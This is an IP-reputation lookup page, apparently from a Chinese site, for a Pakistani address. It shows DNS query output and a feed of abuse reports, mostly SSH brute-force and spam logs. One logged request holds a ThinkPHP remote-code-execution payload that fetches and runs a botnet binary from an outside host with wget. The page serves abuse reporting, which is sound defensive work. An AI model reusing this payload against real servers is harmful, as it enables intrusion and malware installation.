42.201.197.84 - IPInfo

基本信息:

城市(city): Karachi

省份(region): Sindh

国家(country): Pakistan

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.201.197.84
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55980
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;42.201.197.84.			IN	A

;; AUTHORITY SECTION:
.			3540	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019082201 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Fri Aug 23 13:30:23 CST 2019
;; MSG SIZE  rcvd: 117

HOST信息:

84.197.201.42.in-addr.arpa domain name pointer 84.197.201.42-static-fiberlink.net.pk.

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
84.197.201.42.in-addr.arpa	name = 84.197.201.42-static-fiberlink.net.pk.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
209.17.96.202	attack	IP: 209.17.96.202 ASN: AS174 Cogent Communications Port: World Wide Web HTTP 80 Found in one or more Blacklists Date: 22/06/2019 2:59:24 PM UTC	2019-06-23 00:58:36
106.12.202.180	attack	2019-06-22T16:48:51.0284921240 sshd\[25146\]: Invalid user kafka from 106.12.202.180 port 29032 2019-06-22T16:48:51.0342921240 sshd\[25146\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.202.180 2019-06-22T16:48:52.8923411240 sshd\[25146\]: Failed password for invalid user kafka from 106.12.202.180 port 29032 ssh2 ...	2019-06-23 01:05:33
195.55.235.91	attack	Jun 22 16:35:57 mxgate1 postfix/postscreen[3544]: CONNECT from [195.55.235.91]:47253 to [176.31.12.44]:25 Jun 22 16:35:57 mxgate1 postfix/dnsblog[3549]: addr 195.55.235.91 listed by domain zen.spamhaus.org as 127.0.0.3 Jun 22 16:35:57 mxgate1 postfix/dnsblog[3549]: addr 195.55.235.91 listed by domain zen.spamhaus.org as 127.0.0.4 Jun 22 16:35:57 mxgate1 postfix/dnsblog[3547]: addr 195.55.235.91 listed by domain cbl.abuseat.org as 127.0.0.2 Jun 22 16:35:57 mxgate1 postfix/dnsblog[3545]: addr 195.55.235.91 listed by domain bl.spamcop.net as 127.0.0.2 Jun 22 16:35:57 mxgate1 postfix/dnsblog[3546]: addr 195.55.235.91 listed by domain ix.dnsbl.xxxxxx.net as 127.0.0.2 Jun 22 16:35:57 mxgate1 postfix/postscreen[3544]: PREGREET 19 after 0.18 from [195.55.235.91]:47253: EHLO 022china.com Jun 22 16:35:57 mxgate1 postfix/postscreen[3544]: DNSBL rank 5 for [195.55.235.91]:47253 Jun x@x Jun 22 16:35:58 mxgate1 postfix/postscreen[3544]: HANGUP after 0.48 from [195.55.235.91]:47253 i........ -------------------------------	2019-06-23 01:11:01
121.234.41.116	attack	Jun 22 13:33:50 www sshd[32180]: reveeclipse mapping checking getaddrinfo for 116.41.234.121.broad.yc.js.dynamic.163data.com.cn [121.234.41.116] failed - POSSIBLE BREAK-IN ATTEMPT! Jun 22 13:33:50 www sshd[32180]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.234.41.116 user=r.r Jun 22 13:33:52 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:33:54 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:33:56 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:33:59 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:34:01 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:34:03 www sshd[32180]: Failed password for r.r from 121.234.41.116 port 58233 ssh2 Jun 22 13:34:03 www sshd[32180]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ........ -------------------------------	2019-06-23 00:28:11
198.108.67.104	attackbots	9997/tcp 8881/tcp 9108/tcp... [2019-04-22/06-22]127pkt,117pt.(tcp)	2019-06-23 00:35:11
104.196.16.112	attack	$f2bV_matches	2019-06-23 00:42:17
45.55.157.147	attackspambots	Jun 22 18:34:42 ns3367391 sshd\[16964\]: Invalid user sa from 45.55.157.147 port 48940 Jun 22 18:34:42 ns3367391 sshd\[16964\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.157.147 ...	2019-06-23 00:52:44
14.115.107.14	attackspambots	Jun 22 15:51:26 rama sshd[582641]: Bad protocol version identification '' from 14.115.107.14 Jun 22 15:52:49 rama sshd[582693]: Invalid user support from 14.115.107.14 Jun 22 15:53:01 rama sshd[582693]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.115.107.14 Jun 22 15:53:03 rama sshd[582693]: Failed password for invalid user support from 14.115.107.14 port 36399 ssh2 Jun 22 15:53:08 rama sshd[582693]: Connection closed by 14.115.107.14 [preauth] Jun 22 15:54:02 rama sshd[582929]: Invalid user ubnt from 14.115.107.14 Jun 22 15:54:12 rama sshd[582929]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.115.107.14 Jun 22 15:54:14 rama sshd[582929]: Failed password for invalid user ubnt from 14.115.107.14 port 59786 ssh2 Jun 22 15:54:18 rama sshd[582929]: Connection closed by 14.115.107.14 [preauth] Jun 22 15:55:32 rama sshd[583166]: Invalid user cisco from 14.115.107.14 Jun 22 15:55:36 ........ -------------------------------	2019-06-23 00:34:08
118.163.47.25	attack	118.163.47.25 - - \[22/Jun/2019:18:45:59 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://ardp.hldns.ru/loligang.x86 -O /tmp/.loli\; chmod 777 /tmp/.loli\; /tmp/.loli loligang.x86.ThinkPHP' HTTP/1.1" 400 173 "-" "Tsunami/2.0" ...	2019-06-23 00:51:38
13.66.132.31	attackspambots	Many RDP login attempts detected by IDS script	2019-06-23 00:26:18
191.53.57.79	attack	$f2bV_matches	2019-06-23 00:50:06
185.176.27.118	attackbots	22.06.2019 14:44:38 Connection to port 5019 blocked by firewall	2019-06-23 00:47:42
216.218.206.72	attackbots	IP: 216.218.206.72 ASN: AS6939 Hurricane Electric LLC Port: http protocol over TLS/SSL 443 Date: 22/06/2019 2:44:39 PM UTC	2019-06-23 00:45:23
185.2.31.153	attack	Automatic report - SSH Brute-Force Attack	2019-06-23 00:35:45
192.99.186.31	attack	IP: 192.99.186.31 ASN: AS16276 OVH SAS Port: Message Submission 587 Found in one or more Blacklists Date: 22/06/2019 2:44:07 PM UTC	2019-06-23 01:10:04

最近上报的IP列表

123.135.236.46	149.237.40.162	122.96.97.51	180.207.227.207
113.215.189.164	113.54.159.55	204.120.82.140	19.232.106.12
103.113.30.10	89.148.190.137	124.51.192.154	77.192.118.164
41.234.99.7	34.238.138.71	170.158.221.77	209.141.58.87
197.46.20.193	118.107.151.184	173.174.255.181	16.101.228.135